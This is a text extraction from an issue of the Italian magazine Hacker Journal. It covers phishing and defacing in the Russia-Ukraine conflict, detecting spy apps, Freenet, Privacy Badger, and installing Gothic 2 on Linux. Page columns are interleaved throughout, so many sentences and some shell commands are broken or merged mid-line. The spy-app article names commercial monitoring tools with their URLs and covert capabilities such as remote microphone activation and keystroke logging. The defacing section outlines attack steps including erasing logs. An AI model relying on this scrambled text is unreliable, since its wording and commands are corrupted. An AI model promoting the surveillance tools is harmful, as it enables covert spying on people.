TREMATATEI
SMARTPHONE
N.274 Novembre\Dicembre
Dal 2002 tutto quello che gli altri non osano dirti A PROVA
www.hackerjournal.it
La rete anticensura
DI SPIA!
App 100% legali potrebbero nascondere
Si accede tramite un apposito tool Dal 2002 tutto quello che gli altri non osano dirti
www.hackerjournal.it
e ci si trova davvero l’impossibile. La rete anticensura
Cosa abbiamo scoperto oltre il Dark Web
Si accede tramite un apposito tool
Gothic 2 conquista
e ci si trova davvero l’impossibile.
Cosa abbiamo scoperto
in Windows
A PAGINA
10 Gli utenti ignari installano una semplice DLL mancante
nel sistema e aprono così la porta ai pirati per sferrare un attacco
di Privilege Escalation nell’host target
PASSWORD
CRACKING DITE STOP AL IL MESSAGGIO
Gli utenti ignari installano una semplice DLL mancante Come funziona un
“attacco a dizionario” TRACCIAMENTO SI CELA TRA I PIXEL
per scoprire le chiavi
nel sistema e aprono così la porta ai pirati per sferrare un attacco di accesso
Il tool consigliato da Anonymous
che protegge la tua privacy online
Come nascondere testi e foto in
un video grazie alla steganografia
-24% -53%
CARTACEO DIGITALE
6 numeri 6 numeri
solo 17,90€ solo 10,90€
invece di 23,40€ invece di 23,40€
PHISHING
E FA C I N G
E DNICHE E STRATEGIE
TEC
D I P ROT E Z I O N E
elle più adoperate
tacco rientrano tra qu
Queste tipologie di at
U cr ai na . Il lo ro sc op o è quello di fare
sia-
nella cyberguerra Rus m e fu nz io na no e co me ci si difende
i. Ecco co
incetta di dati personal
P
artiamo con il phishing. parole, ingannano gli utenti INDIZI UTILI
Minaccia costante nel attraverso mezzi e tecniche Per proteggersi efficacemente
panorama della d’ingegneria sociale, al fine di dal phishing è fondamentale
sicurezza informatica, è manipolare le vittime e indurle, essere in grado di riconoscere
adoperato nella cyberguerra appunto, a rivelare informazioni gli indicatori comuni che
Russia-Ucraina soprattutto per riservate o compiere azioni possono suggerire la presenza
tentare di sottrarre ai soldati indesiderate. di un attacco. Alcuni elementi da
informazioni tattiche e
strategiche, così da creare
ulteriore scompiglio. Una
strategia indiretta, che cerca di
raggiungere sempre il bersaglio
principale: i siti governativi o
quelli utili alla collaborazione tra
le truppe. Ma come funziona
nello specifico? Quali sono le
tecniche di difesa?
Senza scendere nei dettagli
tecnici (cosa che richiederebbe
troppo spazio visti gli
innumerevoli sistemi di phishing
oggi presenti), vediamo il
meccanismo di funzionamento
e iniziamo col dare una
definizione: si tratta di una
forma sofisticata di attacco
informatico, in cui gli aggressori I tentativi di phishing a opera dei russi nei confronti dell’Ucraina
cercano di ottenere si sono perpetrati per tutto il 2021 e il 2022.
informazioni sensibili. In altre Fonte: https://breakingdefense.com
38
PHISHING E DEFACING
Tipologie e tecniche di phishing
P hishing e-Mail: è la più tradizionale delle tecniche di
phishing, in cui l’attaccante utilizza tecniche di social
engineering per ingannare la vittima. Il vettore d’attacco è
Malware-Based Phishing: è una tipologia di phishing che
avviene attraverso l’avvio di un software dannoso sulla
macchina vittima. Il software viene scaricato dall’ignaro
rappresentato da una email fasulla contenente un link utente attraverso tecniche di social engineering oppure
malevolo su cui la vittima, ignara del pericolo, è portata a sfruttando vulnerabilità del sistema.
cliccare. DNS Phishing: il Domain Name System è il metodo
Spoofed WebSite: conosciuto anche come Phishing utilizzato per assegnare nomi ai nodi di una rete,
Website. L’attaccante plasma un sito falso (fake) “risolvendo” l’indirizzo IP. Avvelenando la risoluzione dei
clonandone uno lecito. La vittima che clicca sul link viene nomi, è possibile reindirizzare la vittima verso l’indirizzo
reindirizzata al sito Web malevolo (spesso molto simile desiderato dall’attaccante.
all’originale) nel quale gli vengono sottratte informazioni Content Injection Phishing: per questo tipo di phishing
sensibili, come password e username. viene compromesso un sito Web attendibile per far sì che
Phone Phishing (o vishing/SMSishing): l’attaccante ospiti contenuti malevoli.
impersona, con una chiamata o un messaggio di testo, Man-In-The-Middle Phishing (MITM): l’attaccante si
qualcuno che la vittima conosce o ritiene attendibile, con inserisce tra le due parti di una comunicazione (per
la finalità di compiere azioni malevole. esempio tra l’utente e il sito Web legittimo) cercando di
Social Media Phishing (Soshing): tra i canali più utilizzati ottenere informazioni intercettando le comunicazioni
dagli attaccanti per ottenere informazioni e raggirare le della vittima.
vittime ci sono i Social Media. Per esempio, gli attaccanti Search Engine Phishing: anche noto come SEO Black
possono circuire la vittima impersonando un nuovo Hat. L’attaccante ottimizza i siti malevoli nell’ottica SEO
contatto, oppure spingendola a visitare pagine di Social per indicizzarli in maniera legittima, in modo che
Media fasulle, finalizzate a estorcere informazioni appaiano all’utente durante la ricerca di prodotti o
sensibili. servizi.
39
SICUREZZA
inviato tramite SMS o nelle operazioni di guerra. L’uso accompagnato da simboli o
un’applicazione di delle tecnologie digitali è immagini. L’obiettivo è attirare
autenticazione. diventato uno strumento l’attenzione e diffondere un
Verificare la sicurezza dei siti fondamentale per la messaggio o una propaganda
web: prima di inserire propaganda, l’acquisizione di specifica.
informazioni personali o informazioni e, in alcuni casi, per
finanziarie su un sito web, l’esecuzione di attacchi mirati. RUSSIA-UCRAINA
verificare che sia protetto Uno degli esempi più evidenti di Durante il conflitto, il defacing è
tramite il protocollo HTTPS e che tali attività si è verificato durante emerso come una tecnica molto
il certificato di sicurezza sia il già citato conflitto tra Russia e utilizzata da entrambe le parti
valido; si può fare osservando il Ucraina, in cui è emerso l’utilizzo coinvolte. Gruppi di hacker legati
prefisso “https://” e il lucchetto diffuso anche della tecnica a entrambi i Paesi hanno preso
nella barra degli indirizzi del tuo hacker nota come “defacing”. di mira i siti web istituzionali e i
browser. Conosciuto anche come media online, sostituendo i
Segnalare gli attacchi di “vandalismo digitale”, il contenuti originali con messaggi
phishing: comunicare sempre defacing – volendo semplificare politici, minacce o dichiarazioni
gli attacchi di phishing alle – prevede la modifica del di vittoria. Attacchi che avevano
autorità competenti, come la contenuto di un sito web o di lo scopo di influenzare l’opinione
polizia o l’organizzazione anti- una piattaforma online senza il pubblica, destabilizzare
cybercrime; inoltre, contattare permesso del proprietario. l’immagine del nemico e creare
l’organizzazione legittima Solitamente si utilizza per confusione all’interno dei
coinvolta per informarla sostituire la pagina principale di rispettivi governi.
dell’attacco. un portale con un messaggio L’uso diffuso del defacing ha
personalizzato o politico, spesso sollevato da subito numerose
CONCLUSIONI
Meccanismo d’attacco
Il phishing rappresenta, dunque,
una minaccia persistente nel
panorama della sicurezza
informatica. Tuttavia,
conoscendo i concetti
L ’attacco di defacing si basa su diverse vulnerabilità comuni presenti nei siti
web e nelle piattaforme online. Un processo generale che gli attaccanti
compiono per eseguire un attacco è il seguente:
fondamentali, le tecniche 1. Identificazione del bersaglio: si individua il sito web o la piattaforma che
utilizzate dagli aggressori e le si intende attaccare. Spesso, i siti vulnerabili o quelli che hanno un alto valore
strategie di protezione, è simbolico o politico diventano obiettivi primari.
2. Ricerca di vulnerabilità: si conduce una ricerca approfondita sulle
possibile ridurre
eventuali debolezze presenti nel sito web target. Ciò può includere l’analisi
significativamente il rischio di delle versioni obsolete del software, delle imperfezioni nella configurazione
cadere vittima di un attacco. del server o delle possibili falle di sicurezza nei plugin e nelle estensioni
Bisogna ricordare sempre di utilizzate.
3. Sfruttamento delle vulnerabilità: una volta individuata una vulnerabilità,
essere vigili, educare se stessi e
si sfrutta quest’ultima per ottenere l’accesso non autorizzato al sistema di
gli altri, e utilizzare le misure di gestione del contenuto o al server che ospita il sito web. Questo può essere
sicurezza consigliate per fatto utilizzando tecniche come l’iniezione di codice (per esempio, SQL
proteggere i dati e l’identità injection) o sfruttando vulnerabilità specifiche del software utilizzato.
online. 4. Modifica del contenuto: una volta ottenuto l’accesso, si va a modificare il
contenuto del sito web. Questo può includere la sostituzione della home
page con un messaggio personalizzato, l’inserimento di immagini, testi o
PASSIAMO AL DEFACING video a sostegno di una causa politica o semplicemente il vandalismo digitale.
Come detto, negli ultimi anni, il 5. Copertura delle tracce: infine, si coprono le proprie tracce eliminando i
mondo ha assistito a un log di accesso o modificando le registrazioni dei file di sistema. Questo rende
più difficile per gli investigatori risalire all’identità degli attaccanti.
crescente coinvolgimento delle
attività informatiche, soprattutto
40
PHISHING E DEFACING
proprietario del sito web che
per l’opinione pubblica. Alcune
delle implicazioni più comuni
sono: il danneggiamento
dell’immagine, vista la
compromissione della
reputazione di
un’organizzazione o di un
individuo e la percezione dei
visitatori del sito che
potrebbero intendere
l’incidente come un fallimento
nella sicurezza e nella gestione
dei dati; la propagazione della
disinformazione, dato che gli
attacchi di defacing spesso
mirano a diffondere un
messaggio politico o a
promuovere una propaganda
specifica.
E questo può influenzare
l’opinione pubblica e creare
tensioni sociali.
Per mitigare gli attacchi di
defacing, è fondamentale
adottare adeguate
contromisure: aggiornamenti
regolari (mantenere il
software, i plugin e le
estensioni del sito web sempre
aggiornati riduce il rischio di
sfruttamento di vulnerabilità
L’SQL injection è una tecnica usata per attaccare applicazioni che conosciute); accessi sicuri
gestiscono dati mediante DB relazionali. In foto, la classificazione (utilizzare password forti,
dei vettori di attacchi SQL injection nel 2010. autenticazione a due fattori e
limitare gli accessi privilegiati
preoccupazioni per la sicurezza sia facile per i gruppi hacker solo agli utenti autorizzati);
informatica. Innanzitutto, ha manipolare e diffondere la monitoraggio costante
evidenziato l’importanza di disinformazione. Questo tipo (implementare strumenti di
proteggere adeguatamente i di attacco può infatti monitoraggio e rilevamento
siti web istituzionali e le influenzare l’opinione pubblica delle anomalie per identificare
piattaforme online. Un attacco e creare tensioni tra le nazioni potenziali attacchi e
di tale tipo può danneggiare la coinvolte. rispondere tempestivamente);
reputazione di backup regolari (eseguire
un’organizzazione o un Paese e CONTROMISURE regolarmente backup dei dati
causare confusione tra i Le conseguenze di un attacco del sito web per ripristinare
cittadini. In secondo luogo, il di defacing possono essere rapidamente il contenuto
defacing ha dimostrato quanto significative, sia per il originale in caso di attacco).
41
SICUREZZA
N
egli ultimi anni, con distanza, con tutte le implicazioni che consentono di condividere in
l’incremento dell’utilizzo che ne derivano. Altre volte sono tempo reale la propria posizione e
degli smartphone anche app comuni, spesso utilizzate i percorsi scelti; se tali informazioni
da parte di persone non quotidianamente, che possono vengono condivise con utenti
avvezze alla tecnologia, si è rivelarsi pericolose. Tali software sconosciuti iscritti all’app,
verificato un aumento possono raccogliere dati personali diventerebbero risorse preziose
esponenziale delle attività di che, nelle mani di individui per potenziali criminali, che
spionaggio digitale. Applicazioni malintenzionati, diventano potrebbero monitorare la vostra
progettate e installate a insaputa informazioni di valore. Come posizione, così come i giorni e gli
dell’utente che consentono a terzi alcune app destinate agli orari in cui vi allenate, con tutto
di accedere al dispositivo a appassionati di corsa o ciclismo quello che comporta!
42
APP SPIA
MA IO SONO SPIATO?
Installando alcune app, i BASTA INSTALLARE UNA SOLA APP
cybercriminali hanno la
possibilità di intercettare e
PER SCOVARLE TUTTE...
registrare chiamate in tempo Ecco come rintracciare applicazioni e servizi annessi
reale, sia che avvengano tramite che “girano” di nascosto sullo smartphone.
una linea telefonica tradizionale
sia mediante applicazioni come
1 SCARICATE L’APP DALLO STORE
Dal Play Store cercate l’app App Killer: Close running
Facebook, Skype e WhatsApp; Apps, quindi procedete con l’installazione cliccando
senza contare che spesso sono sul pulsante Installa e poi su Apri, alternativamente
anche in grado di attivare il potete raggiungere l’app direttamente visitando
microfono da remoto e questa URL: https://play.google.com/store/apps/
details?id=com.killapps.closeapps.
registrare l’ambiente circostante!
closerunningapps&hl=it&gl=US. L’app, semplicissima da
E quindi, come comportasi? usare, consente di accedere a tutte le app e servizi
Come ci si può difendere? annessi attualmente in uso sullo smartphone
Beh, partiamo dai controlli che (pulsante Close All Running Apps), tutte le app
possono indicarci una spia... installate sul dispositivo (App Manager) e la lista delle
Passo 1 - Controllate app e app che ritenete essere sicure (White List). Cliccando
sui primi due pulsanti potrete accedere a una serie di
processi in esecuzione: fatelo
informazioni molto utili.
ricorrendo ad app specifiche
(vedi tutorial a destra). Se 2 QUALI APP GIRANO A VOSTRA INSAPUTA?
doveste notare applicazioni o Il pulsante Close All Running Apps mostra l’elenco
processi non riconosciuti, o che delle app e dei servizi attualmente avviati sullo
consumano molte risorse, smartphone. Cliccando sulla singola app, poi su App
information, potrete ottenere maggiori info a
potrebbe essere il segno di
riguardo: tempo di utilizzo, traffico dei dati ecc. o
un’app spia installata a vostra disinstallarla direttamente. Per stoppare tutte le app
insaputa. istantaneamente potete cliccare sul pulsante
Passo 2 - Controllate le reti: circolare rosso posto al centro della schermata; la
accedete alle impostazioni del prima volta l’app vi inviterà a concedere le
dispositivo e controllare tutte le autorizzazioni necessarie dirottandovi nel menu
Accessibilità di Android dal quale flaggare la voce
voci presenti nella sezione
Usa App Killer. Se ritenete l’app utile, potrete
networking. Fate attenzione ai aggiungerla alla White List cliccando sull’omonimo
nomi di reti non riconosciute. pulsante verde.
Anche questo potrebbe essere
il segno della presenza di 3 LE APP INSTALLATE NELLO SMARTPHONE
Dal menu principale dell’app è possibile accedere a
un’app che sta configurando il
tutte le app installate nel dispositivo: basterà cliccare
dispositivo per inviare dati in sul pulsante App Manager. Anche in questo caso
remoto. l’app vi consentirà di accedere a info dettagliate su
Passo 3 - Controllate il traffico ciascuna app elencata e la possibilità di aggiungerla
dati: sempre nelle alla White List. L’iconcina filtro posta in alto a destra
impostazioni del telefono, consente di filtrare le app tra quelle di sistema e
quelle installate a livello utente. Sempre dal menu
controllate il traffico di rete.
principale dell’app è possibile cliccare su White List
Trasferimenti di dati per accedere all’elenco di tutte le applicazioni che nel
pesanti o applicazioni non tempo sono state contrassegnate come “sicure”. In
riconosciute che spostano con ogni momento sarà possibile rimuovere ogni singola
una certa frequenza dati in app dalla lista cliccando sul relativo pulsante Remove
rete, potrebbero essere un from White List.
segnale di una o più app spia.
43
SICUREZZA
RIMUOVERE I MALWARE IN POCHI CLIC... E NON SOLO!
Grazie a un potente tool potete eseguire una scansione gratuita del sistema
per rilevare minacce e vulnerabilità, scovare le applicazioni dannose prima
ancora che si installino, bloccare collegamenti e siti web pericolosi, verificare
la sicurezza delle reti Wi-Fi ed eventuali configurazioni del sistema in grado
compromettere il dispositivo.
1 2
3 4
44
DASDASDSDASDASDASD
APP SPIA
SU ANDROID E OLTRE
Sul sistema operativo di Google iPhone: sei più al sicuro?
è presente Google Play Protect,
un’app pre-installata che
verifica le applicazione scaricate
dal Play Store. Tuttavia, in molti
casi, per funzionalità specifiche,
è preferibile ricorrere a
soluzioni più efficaci. Come
quelle che riportiamo di
seguito, tra le migliori app utili
a verificare la presenza di
applicazioni spia sullo
smartphone.
La prima si chiama
Malwarebytes Mobile
Security, è un’app disponibile
per Android e iOS. Abbiamo
deciso di citarla perché è
capace di scovare, oltre ai
malware, anche i tentativi di
furto di identità, e altre
minacce online. Offre infatti
funzionalità anti-malware,
blocco degli annunci
pubblicitari, filtri e algoritmi in
grado di bloccare siti di
S ebbene l’approccio di Apple in
alcuni contesti possa
sembrare poco intuitivo per gli
consente l’installazione di qualsiasi
app sul dispositivo, fuori quindi dal
recinto delle app presenti sullo
phishing e altri siti dannosi che utenti, si dimostra estremamente store ufficiale di Apple. Tra queste
potrebbero contenere anche efficace nella protezione della “app non ufficiali” è possibile
spyware e ransomware. privacy. iOS, infatti, impedisce imbattersi in software dannosi
alle app di accedere capaci di installare malware, rubare
E poi c’è Bitdefender Mobile profondamente al sistema, dati personali o compiere
Security che offre protezione prevenendo qualsiasi tentativo di qualunque altra operazione
antivirus grazie a un potente monitoraggio delle attività sul criminale già accennata in questo
scanner integrato (su Android), telefono. articolo. Per verificare se il proprio
Questo almeno per quanto iPhone, magari acquistato di
la possibilità di impedire l’uso
riguarda un dispositivo non seconda mano, è stato oggetto di
improprio di qualsiasi app del manomesso; esiste infatti la jailbreak, è sufficiente cercare l’app
proprio smartphone (Android e possibilità di effettuare su alcuni Cydia. Se presente, è probabile che
iOS) che invia informazioni su iPhone il cosiddetto jailbreak, che il dispositivo sia stato jailbreakato.
Internet e di eseguire una
scansione utile a scoprire e
correggere la presenza di
configurazioni errate. Cos’è Google Play Protect?
Consente anche di bloccare,
geolocalizzare ed emettere un
allarme cancellando i contenuti È il sistema di protezione anti-malware integrato in tutti i dispositivi Android di
ultima generazione. Controlla le app già al momento del download dal Play
Store ed esegue periodicamente la scansione del dispositivo alla ricerca di app
dello smartphone da remoto. potenzialmente dannose, eventualmente inviando notifiche di alert, disattivando
Infine, la funzionalità VPN vi fa le app ritenute malevoli o rimuovendole automaticamente.
navigare in perfetto anonimato!
45
SICUREZZA
APP CHE (IN MANI HOVERWATCH ATTENZIONE!
SBAGLIATE!) POSSONO Accedendo al sito ufficiale si È opportuno ricordare, in questa
DIVENTARE PERICOLOSE legge: “Questa è la migliore sede, e bisogna farlo con enfasi,
Le app spia sono quasi sempre applicazione per proteggere le che l’atto di spiare un
frutto di malware, tuttavia anche proprie famiglie e le imprese”. E dispositivo mobile altrui non è
software apparentemente infatti si tratta proprio di un soltanto una violazione della
innocui e utili, come ad esempio software dedicato alla privacy dell’individuo, ma
di controllo parentale, nelle sicurezza. Ma, installando rappresenta a tutti gli effetti
mani sbagliate possono Hoverwatch, non è difficile un illecito penale. Questo
trasformarsi in potenti spie accedere ad app social e di genere di comportamento,
digitali, così come quelle messaggistica (SMS, Facebook, spesso dettato da curiosità, dalla
riportate di seguito... WhatsApp ecc), cronologia delle gelosia o, in alcuni casi, da
chiamate, microfono, intenzioni maligne, non deve
FLEXISPY fotocamera, GPS tracking, attività essere sottovalutato nella sua
Si tratta di un software di sul web, calendario e contatti. gravità! La legge italiana, infatti,
monitoraggio e controllo https://www.hoverwatch.com/it/ prevede sanzioni severe per chi si
parentale. Ma ciò non impedisce rende colpevole di tali azioni.
ai malintenzionati di utilizzarlo XNSPY Nello scenario legislativo emerge
per altri fini. Con Flexispy, infatti è È un’applicazione che consente chiaramente come vi siano delle
facile attivare da remoto il di controllare telefonate e ripercussioni concrete per chi
microfono per ascoltare e contatti, posizione GPS, app di decide di violare l’intimità altrui
registrare (anche le telefonate messaggistica, ricevere avvisi attraverso l’accesso non
live), localizzare il dispositivo, istantanei su parole specifiche autorizzato a dispositivi
monitorare le app di chat, digitate, inviare comandi elettronici. Le condanne, in
contatti, calendari, cronologia e remoti per la registrazione, particolare, possono variare in
preferiti web, scattare foto a acquisire schermate da base alla gravità e alla natura
distanza, registrare ogni tasto remoto, visualizzare tutte le del reato, ma possono arrivare,
premuto dall’utente. attività web. in certe circostanze, anche ai
https://www.flexispy.com/it/ https://it.xnspy.com/. quattro anni di reclusione.
46
H OW TO
RETI P2P La rete anticensura oltre il DarkWeb
Si accede tramite un apposito tool e ci si trova davvero l’impossibile.
Cosa abbiamo scoperto... ������������������������������������������������������������������������������������������������������������������������������48
47
HOW TO
LA RETE ANTICENSURA
OLTRE IL DARKWEB!
Si accede tramite un apposito tool e ci si trova davvero l’impossibile.
Ecco cosa abbiamo scoperto
V
olendo darne una un documento, questo viene
IN BREVE defezione, possiamo dire suddiviso in pezzi e replicato su
Come collegarsi e che Freenet è una rete diversi nodi nella rete e ciò consente
navigare su Freenet peer-to-peer (P2P) che di garantire la disponibilità dei dati
DIFFICOLTÀ consente agli utenti di condividere e anche in presenza di nodi che
accedere a dei contenuti in modo lasciano la rete o vengono rimossi. A
sicuro e anonimo. In pratica, è un ciascun “pezzo” viene poi associata
software open source che permette una chiave crittografica generata dal
di collegarsi a una Rete contenuto stesso: gli utenti possono
decentralizzata e resistente alla dunque cercare e accedere ai
censura. Un sistema progettato per contenuti utilizzando le suddette
AVVERTENZE!
consentire agli utenti di scambiarsi chiavi, senza rivelare così quali dati
Prima di vedere come
installare e utilizzare il file e comunicare in modo sicuro si stanno cercando o condividendo.
software Freeneet, visti i senza rivelare la propria identità o la
vantaggi offerti e il
sistema di
posizione fisica. STOP ALLA CENSURA!
funzionamento, è bene Grazie alla natura decentralizzata di
fare due premesse. La COME FUNZIONA? Freenet, la rete è resistente alla
prima: navigando su Quando un utente invia una censura. Poiché i contenuti sono
Freneet noterete una
certa lentezza nel richiesta o scambia un file su distribuiti sui nodi, diventa difficile,
caricamento delle pagine. Freenet, i dati vengono suddivisi in se non impossibile, per un’entità
Questo è dovuto al tempo
piccoli pezzi e cifrati. Questi pezzi centrale o un governo individuare e
per il download dei vari
“pezzi” sparsi nei nodi vengono inviati attraverso una serie bloccare o rimuovere dei contenuti
che vengono poi di nodi intermedi, chiamati nodi di specifici. Senza contare che Freenet
“ricostruiti” dal
programma sulla vostra
routing, che non consentono di consente agli utenti anche di
macchina. La seconda: determinare l’origine o la comunicare in modo anonimo
fate attenzione a cosa destinazione dei dati. In sostanza, attraverso i forum di discussione e i
scaricate. Dato
l’anonimato e l’assenza non esiste un server centrale o servizi di messaggistica disponibili.
di censura, infatti, c’è chi un’autorità di controllo: i nodi sono Il sistema di funzionamento e le
ha pensato bene di tutti uguali e cooperano tra loro per caratteristiche tecniche di Freenet
caricare e/o diffondere
sulla rete anche mantenere e distribuire i file. hanno fatto sì che il software venisse
contenuti, per così dire, Freenet utilizza anche un sistema di anche suggerito dal collettivo
poco ortodossi... Occhio, storage particolare e distribuito per Anonymous in quella che abbiamo
quindi, potreste
ritrovarvi nel Pc file archiviare i dati condivisi: come definito più volte come “La cassetta
vietati dalla legge! accennato, quando un utente carica degli attrezzi anticensura”.
48
FREENET
FREENET, PER UNA NAVIGAZIONE LIBERA
1 2
3 4
49
HOW TO
DITE STOP
AL TRACCIAMENTO
Grazie a un’estensione per il browser, proteggerete la vostra privacy
e l’invasione operata dalla pubblicità. Ecco come funziona
P
rivacy Badger è un’estensione comportamenti e alle preferenze. Per
IN BREVE per browser sviluppata esempio, se si visita regolarmente un
Come utilizzare dall’Electronic Frontier sito che utilizza un servizio di
correttamente Privacy Foundation (EFF), tracciamento legittimo, Privacy Badger
Badger per proteggere
un’organizzazione non profit impegnata imparerà a non bloccare quel
la vostra privacy in
Rete nella difesa della privacy e dei diritti particolare elemento, garantendo così
digitali degli utenti. L’obiettivo principale una navigazione fluida.
DIFFICOLTÀ
è quello di impedire il tracciamento
online non desiderato e proteggere la PERSONALIZZAZIONE
privacy durante la navigazione. L’estensione offre un livello di
protezione della privacy
COME FUNZIONA personalizzabile. Dopo l’installazione,
Disponibile per diversi browser, tra cui inizia subito a bloccare gli elementi di
Chrome e Firefox, si occupa di bloccare i tracciamento che rileva.
cosiddetti tracker. In sostanza, quando Tuttavia, dà anche all’utente la
si naviga su un sito, l’estensione analizza possibilità di modificare le impostazioni
gli elementi della pagina e rileva i di blocco in base alle proprie
tentativi di tracciamento di terze parti, preferenze: è possibile decidere di
come cookie e script. Le frena e consentire il tracciamento su un
impedisce loro di raccogliere dati sulle determinato sito o bloccarlo oppure di
attività online. Interessante è visualizzare la lista dei siti web visitati e
l’apprendimento automatico. Ciò gli elementi di tracciamento bloccati per
significa che impara dalle interazioni con ciascuno di essi e rimuovere il blocco,
i siti web nel tempo, adattandosi ai giusto per fare qualche esempio.
50
PRIVACY BADGER
BLOCCARE I TRACKER CON UN CLIC DEL MOUSE
1 2
L’ESTENSIONE INSTALLAZIONE
Collegatevi sul chrome web store all’indirizzo https:// Selezionate il pulsante azzurro Aggiungi e, subito dopo,
chrome.google.com/webstore/category/extensions. Se Aggiungi estensione. Una finestra pop-up vi avviserà
utilizzate Firefox, invece, andate su https://addons.mozilla. della corretta installazione. Cliccateci su. Vi si aprirà una
org/it/firefox/extensions/. Cercate “privacy badger” finestra del browser con il sito di benvenuti e un
nell’apposito campo di ricerca e cliccate sul primo risultato. messaggio “Grazie per aver installato Privacy Badger!”.
3 4
5 6
51
HOW TO
GOTHIC 2 CONQUISTA
ANCHE IL PINGUINO!
Siamo riusciti a installare su Linux questo mitico gioco di ruolo.
Ecco il diario della ricompilazione
G
othic è un gioco per Windows installare la versione opensource
IN BREVE del 2001. Ma non solo. È del motore grafico di Gothic! La
In questa guida vi anche uno spartiacque, una scelta, nello specifico, è ricaduta sul
faremo vedere come pietra miliare etichettata motore di Gothic 2, una versione più
installare Gothic 2,
come la linea guida per tutti i titoli che evoluta rispetto alla precedente.
gioco per Windows del
2001, anche sul sono venuti dopo. Ambientato Per farlo, vi narreremo le operazioni
sistema del “pinguino” indicativamente in epoca medievale, compiute come se le stessimo
DIFFICOLTÀ
annovera paladini, maghi, draghi, scrivendo su un vero e proprio
non-morti, guerrieri e una pletora di diario personale. Il fine sarà
PNG (Personaggi Non Giocanti) che supportare Gothic 2, comprensivo
possono diventare alleati o nemici a dell’espansione “La notte del Corvo”,
seconda delle azioni che si compiono. arrivando, dopo una serie di
È un modo “vivo”: c’è il ciclo notte/ operazioni, non semplicissime, a
giorno, la pioggia... e i personaggi che giocare questo bellissimo titolo su
mangiano, dormono e lavorano… Linux [figura #1].
certo, tutte cose “normali” oggi, ma
rivoluzionarie all’uscita. MIO CARO DIARIO...
La storia vede gli orchi invasori venuti La prima cosa che faccio è
ad attaccare le terre degli umani, che scompattare il file del gioco, azione
sono sul punto di soccombere. Sarà fattibile con programmi come ZIP o 7z.
compito del protagonista, risollevare le Va storto qualcosa e il file non viene
sorti della popolazione. riconosciuto.
Perché vi parliamo di tutto questo? Cominciamo bene! Così decido di agire
Semplice, perché vi mostreremo come in un modo più lungo, ma credo che
figura #1
funzionerà, utilizzando macchine
Durante il gioco, virtuali (MV) e un disco rigido di
l’eroe si troverà servizio su cui fare le varie prove, allo
davanti una scopo di non contaminare la mia
colonia penale: installazione principale. Mi procuro:
riuscirà a
entrare? • Immagine ISO di istallazione di
Widows XP;
• File exe di installazione di Gothic 2 “La
notte del Corvo”
52
IL DIARIO DI UNA RICOMPILAZIONE
figura #2 L’installazione e preambolo. Si sentono i dialoghi
del gioco su iniziali ma non si vede la grafica,
macchina ma tanto mi basta per capire che il
virtuale è gioco è installato correttamente.
necessaria per Spengo Windows e passo alla
recuperare i file parte GNU/Linux. Creo un
di gioco. file-disco da 10 GB per Debian 11,
recupero la ISO di installazione e
avvio la VM:
$ dd if=/dev/zero of=debian_11.
img bs=1M count=10240
immagine_iso_windows_ p.iso
• Immagine ISO di istallazione di $ wget https://cdimage.debian.
-boot d
Debian 11 org/debian-cd/current/amd64/
• Hard disk di recupero (nel mio iso-cd/debian-11.6.0-amd64-
caso, un vecchio disco da 40 GB) procedo con l’installazione e, una netinst.iso
• Capacità nel destreggiarsi a riga volta completata, spengo la $ kvm -m 2G -hda debian_11.img
di comando, esperienza nel macchina virtuale. Ora devo -cdrom debian-11.6.0-amd64
“problem solving” e pazienza :-) passare il file di setup alla VM -netinst.iso -boot d
Windows: un trucco è “formattare”
L’ambiente di lavoro è un PC a 64 il file da passare come se fosse Per Debian installazione testuale,
bit con Debian GNU/Linux, un l’immagine ISO di un CD che potrà una partizione sola, niente swap,
disco primario (SDA) con il sistema quindi essere montato come se niente grafica o programmi di
operativo e un disco (SDB) fosse un CD fisico: supporto: lo stretto necessario!
secondario, che sarà il contenitore Poi, spengo la macchina virtuale
del sistema finale con – si spera $ cd per escludere la ISO di
– opengothic funzionante. $ mkdir g2_tmp installazione e per agganciare
Il sistema dispone dei programmi $ cp setup_gothic_2_gold_ l’immagine Windows [figura #3].
necessari (quali kvm, wget ecc.). edition.e e g2_tmp/ Riavvio con:
Come sempre, il simbolo # $ mkisofs -o g2.iso g2_tmp/
indica che lavoro come $ rm g2_tmp/setup_gothic_2_ $ kvm -m 2G -hda debian_11.img
amministratore mentre il gold_edition.e e -hdb windowsXP.img
simbolo $ indica che il comando $ rmdir g2_tmp
è impartito da un utente. attivo i repository extra con:
Riavvio la macchina virtuale
ORA LAVORO SUL PC, SDA aggiungendo l’immagine ISO: # nano /etc/apt/source.list
Creo un file-disco da 8 GB per
Windows: $ kvm -m 2G -hda windows_XP.img e aggiungo “contrib non-free”
$ cd -device AC97 -vga cirrus -cdrom dopo il primo “main”: salvo con
$ dd if=/dev/zero of=windows_ g2.iso Ctrl-X, confermo con “s”.
XP.img bs=1M count=8192
All’interno della MV Windows, Aggiorno e installo quanto segue:
avvio la macchina virtuale nella l’immagine g2.iso viene vista come
quale installerò la mia copia di se fosse un CD, che uso per # apt-get update
Windows XP: eseguire l’installazione [figura #2]. # apt-get install wget
Lancio il gioco e, dopo qualche firmware-misc-nonfree firmware-
$ kvm -m 2G -hda windows_XP.img secondo, parte la sigla: schermata realtek mc net-tools l de
-vga cirrus -device AC97 -cdrom nera, poi il video di presentazione firefo
53
HOW TO
Siccome la macchina fisica figura #3 Per risparmiare
dispone di una scheda video tempo,
NVIDIA e che alla fine la VM Linux l’installazione di
andrà riversata su SDB, il Debian deve
pacchetto firmware-misc- essere minimale:
nonfree mi serve per supportare solo quello che
l‘hardware reale serve!
attivo la grafica con:
# /etc/init.d/lightdm restart
54
IL DIARIO DI UNA RICOMPILAZIONE
# apt-get install libvulkan-dev
nei vari messaggi vedo scorrere Va bene, anzi no, non va bene
l’informazione che mi interessa: niente… però calma, dai,
libc6 viene aggiornata alla versione ragioniamo: evidentemente le e stavolta va tutto bene! Mi
2.36-8. Finito l’aggiornamento, versioni di libvulkan-dev e vulkan- rincuoro e ci riprovo:
tramite il comando: headers non sono identiche.
# apt-get install vulkan-sdk
# dpkg -l | grep libstdc/+6 Indago sui due pacchetti con:
# apt-cache show libvulkan-dev ma ancora una volta, errore, lo
osservo che tale libreria è ancora | grep Version stesso di prima dell’incolpabilità
ferma alla versione 10.2.1-6: no # apt-cache show vulkan-headers tra le versioni di vulkan-headers e
buono! Potrei installarla | grep Version libvulkan-dev… la cosa mi pare
singolarmente, ma fatto trenta, strana: i due pacchetti sono stati
faccio trentuno: aggiorno il sistema e vedo che ci sono MOLTE versioni installati e non hanno dato
completamente con: di entrambi i pacchetti ma per problemi, perché il tentativo
coerenza, vanno installati nella d’installazione di vulkan-sdk dà
